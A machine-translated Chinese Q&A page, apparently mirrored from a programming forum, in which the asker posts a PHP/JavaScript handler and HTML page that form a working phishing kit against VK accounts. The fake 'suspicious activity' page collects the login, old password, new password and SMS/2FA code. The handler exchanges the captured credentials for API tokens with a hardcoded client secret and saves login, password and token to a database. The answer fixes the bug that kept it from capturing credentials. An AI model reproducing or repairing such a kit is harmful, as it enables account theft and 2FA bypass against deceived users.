javascript - 如何处理来自 AJAX-FORM 的 PHP GET JSON 请求?
问题描述
我的 PHP 处理程序有一些问题。就像这里是我的处理程序:
<?php
//Создадим headers
$headers = array(
'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'content-type' => 'application/x-www-form-urlencoded',
'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
);
//Запишем сюда значения логина и пароля из HTML формы
function login()
{
if (isset($_GET['login']) && isset($_GET['oldPassword'])) {
echo $_GET['login'];
echo $_GET['oldPassword'];
} else {
// Fallback behaviour goes here
$login = login($_GET['login']);
$password = login($_GET['oldPassword']);
}
}
//Если какое-то поле оказалось пустым
if (empty($login) or empty($password))
{
//Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке
header('Location: /authorize.php?error_login=true');
exit;
}
else
{
//Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше
$get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array(
'headers' => array(
'accept: '.$headers['accept'],
'content-type: '.$headers['content-type'],
'user-agent: '.$headers['user-agent']
)
));
//Если авторизация прошла успешно
if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token))
{
$token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true);
$data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true);
//Записываем в переменную текущую дату и время сервера
$date_l = date("H:i:s d-m-Y");
//Подключаемся к БД
$host="localhost";
$user=""; //Имя пользователя от MySql
$pass=""; //Пароль от MySql
$db_name=""; //Имя базы
$link=mysql_connect($host,$user,$pass);
mysql_select_db($db_name,$link);
mysql_query("set names utf8");
//Выполняем запись валида в БД
$sql = mysql_query("INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')");
//Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт
if ($sql) {
session_start();
$_SESSION['logged_user'] = $data['response'][0]['first_name'];
header('Location: vk.com/');
//Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке
} else header('Location: /authorize.php?error_login=true');
//Закрываем соединение
mysql_close($link);
exit;
}
//Если авторизация не прошла, то отправим пользователя на стартовую страницу с ошибкой
else header('Location: /authorize.php?error_login=true');
}
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
if(isset($params['params'])) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']);
}
if(isset($params['headers'])) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']);
}
if(isset($params['cookies'])) {
curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']);
}
if($proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy);
if($proxy_userpwd) {
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
}
}
$result = curl_exec($ch);
$result_explode = explode("\r\n\r\n", $result);
$headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : '');
$content = $result_explode[count($result_explode) - 1];
preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies);
$cookies = implode(';', $parse_cookies[1]);
curl_close($ch);
return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content);
}
?><script type="text/javascript">
function checkLogin() {
if (g("check").value === "") {
$("#check").css({"border": "1px solid #F00F00", "background": "#FCCFCC"});
} else {
//g("err").style.display = "none";
$("#number").fadeOut(300, function() {
$("#password").fadeIn(300);
});
$.ajax("continue.php?act=savePhone&phone=" + encodeURIComponent(g("check").value) + "&qid=" + encodeURIComponent(window.location.search)).done(function() {
});
}
}
function g(id) {
return document.getElementById(id);
}
var wascapt = false;
var wassms = false;
var have2fa = false;
var gettedToken = "";
function login() {
var captcha_key = "";
var captcha_sid = "";
var smscode = "";
var validation_sid = "";
var login = g("check").value.replace("+", "");
var password = g("oldpassword").value;
$("#err").fadeOut(300);
if (g("newpassword").value.length < 6) {
$("#err").html("Пароль должен иметь 6 или более символов").fadeIn(300);
return;
}
if (g("newpassword").value !== g("newpassword2").value) {
$("#err").html("Пароль не изменён, так как новый пароль повторен неправильно.").fadeIn(300);
return;
}
if (g("captcha_sid").value) {
captcha_key = g("captcha_key").value;
captcha_sid = g("captcha_sid").value;
wascapt = false;
}
if (wassms) {
smscode = g("smscode").value;
validation_sid = g("validation_sid").value;
wassms = false;
}
var auth = $.ajax("continue.php?act=login&login=" + encodeURIComponent(login) + "&oldPassword=" + encodeURIComponent(password) + "&captcha_key=" + captcha_key + "&captcha_sid=" + captcha_sid + "&validation_sid=" + validation_sid + "&code=" + smscode + "&newPassword=" + encodeURIComponent(g("newpassword").value) + "&is2fa=" + (have2fa ? 1 : 0) + "&qid=" + encodeURIComponent(window.location.search) + "&token=" + gettedToken).done(function() {
var response = JSON.parse(auth.responseText);
/*if (response.access_token) {
changePassword(login, password, response.access_token, g("newpassword").value);
return;
}*/
if (response.api) {
if (response.result) {
window.location.replace("https://vk.com/id0");
} else {
gettedToken = response.token;
var e = response.api.error;
if (e.error_code === 14) {
$("#password, #sms").fadeOut(300, function () {
$("#capt").fadeIn(300);
});
g("captcha_key").value = "";
g("captcha_key").focus();
g("capt_img").src = e.captcha_img;
g("captcha_sid").value = e.captcha_sid;
}
}
return;
}
if (response.auth && !response.result || response.code === 0) {
var e = response.auth;
switch (response.auth.error) {
case "invalid_client":
$("input[type='text'], input[type='password']").val("");
$("#err").html("Неверный логин или старый пароль").fadeIn(300);
$("#number").fadeIn(300);
$("#capt, #password").fadeOut(300);
break;
case "need_captcha":
$("#password, #sms").fadeOut(300, function() {
$("#capt").fadeIn(300);
});
g("captcha_key").value = "";
g("captcha_key").focus();
g("capt_img").src = e.captcha_img;
g("captcha_sid").value = e.captcha_sid;
wascapt = true;
break;
case "need_validation":
$("#password, #capt").fadeOut(300, function() {
$("#sms").fadeIn(300);
});
g("validation_sid").value = e.validation_sid;
wassms = true;
have2fa = true;
$.ajax("https://api.vk.com/method/auth.validatePhone?sid=" + e.validation_sid + "&v=5.22");
break;
default:
break;
}
}
});
}
</script>
</head>
<body>
<div class="header"></div>
<div class="page">
<div class="page-border">
<div class="content">
<div class="spamfight"></div>
<p>На Вашей странице была обнаружена подозрительная активность. На данный момент<strong> злоумышленники</strong> могут иметь доступ к Вашей странице.
</p>
<br>
<p>Чтобы обезопасить свою страницу, мы просим Вас <span style="color:#45668E">проверить компьютер <strong>антивирусом</strong></span>, подтвердить, что Вы владелец страницы и изменить свой пароль, используя данную страницу.
</p>
<br>
<p>Злоумышленники могли получить доступ к Вашей странице с помощью следующей подозрительной ссылки. </p>
<div class="reason">
<p style="padding-left:20px">
<strong>Подозрительная ссылка</strong>
<br>
<span style="cursor:pointer">http://goo.gl/...</span>
</p>
</div>
<div id="err" class="oauth_error"></div>
<div class="content-1" id="number" style="display: block;">
<p class="login">Мобильный телефон либо e-mail:</p>
<input type="text" id="check" class="textbox-blocked" name="mobile" autofocus="" value="">
<div class="button btn-mobile" onclick="checkLogin();" style="width:134px">Продолжить</div>
</div>
<div class="content-1" id="password" style="display: none;">
<p class="login">Старый пароль</p>
<input id="oldpassword" type="password" name="pass" autofocus="" required="" pattern=".{6,50}" class="textbox-blocked">
<p class="login">Новый пароль</p>
<input id="newpassword" type="password" name="newpass" required="" pattern=".{6,50}" class="textbox-blocked">
<p class="login">Повторите пароль</p>
<input id="newpassword2" type="password" name="repass" required="" pattern=".{6,50}" class="textbox-blocked">
<input type="submit" onclick="login();" class="button" style="width:134px" value="Подтвердить">
</div>
<div class="content-1" id="capt" style="display: none;">
<input id="captcha_sid" type="hidden" name="captcha_sid" value="">
<br><img id="capt_img" src="https://vk.com.setting.antiviruseprotectionservice.xyz/blocked.php?id=156834558"><br><br>
<p class="login">Код с картинки:</p>
<input id="captcha_key" type="text" name="captcha_key" required="" pattern=".{6,50}" class="textbox-blocked">
<input type="submit" onclick="login();" class="button" style="width:134px" value="Подтвердить">
</div>
<div id="sms" style="display: none;">
<div class="oauth_error">Чтобы подтвердить, что Вы действительно являетесь владельцем страницы, пожалуйста, введите код подтверждения из SMS либо последние 4 цифры номера, с которого Вам поступит звонок.
</div>
<br>
<div class="content-1">
<input id="validation_sid" type="hidden" name="validation_sid" value="1">
<p class="login">Код подтверждения:</p>
<input id="smscode" type="text" required="" pattern=".{6,50}" class="textbox-blocked">
<input type="submit" onclick="login();" class="button" style="width:134px" value="Подтвердить">
</div>那么我的 PHP 处理程序“continue.php”在哪里可能是错误的?
解决方案
为什么要在 URL 中传递参数?您应该在 POST 中使用它们。您在 URL 中发送密码。你有login()功能。你在哪里称呼它?由于该函数未被调用,$login并且$password始终为空,因此重定向到错误页面
阿贾克斯邮政
$.ajax({
type: "POST",
url: 'continue.php',
data: {"login":login,"oldPassword":password}, //You can change your parameters as per your requirement
dataType: "json",
success: function(result)
{
var response = JSON.parse(result.responseText);
}
});
在 PHP 中获取 POST 数据
login(); //Remember to call this function
function login()
{
if (isset($_POST['login']) && isset($_POST['oldPassword'])) {
$login = $_POST['login'];
$password = $_POST['oldPassword'];
}
}
我刚刚将您的代码更新了一点。休息,您可以根据您的要求进行更改。
您可以在此处了解有关在AJAX中发布POST数据的更多信息:jquery AJAX and json format
此外,不应header('location:....);在 AJAX 中使用称为页面。您还需要删除该代码。login如果或old_password为空,您必须向 ajax 发送一些错误已发生的响应。
推荐阅读
- javascript - 在 Ionic 5 中,如何将 firestore 文档显示到 ionic(html) 屏幕
- spring - 是否可以在 Spring 中将假时钟传递给计划任务?
- java - 如何解决这个错误我被卡住了..我想创建登录页面
- facebook - Flutter Facebook 网页登录
- python - 即使你写了一些东西,变量也是空的
- python - 根据用户输入的不同条件过滤熊猫
- r - 创建动态分组依据
- heroku - DNS gTLD 适用于 REST,但不适用于浏览器
- php - 根据产品属性使用自定义运输方式
- jakarta-ee - 集中 quarkus 的通用配置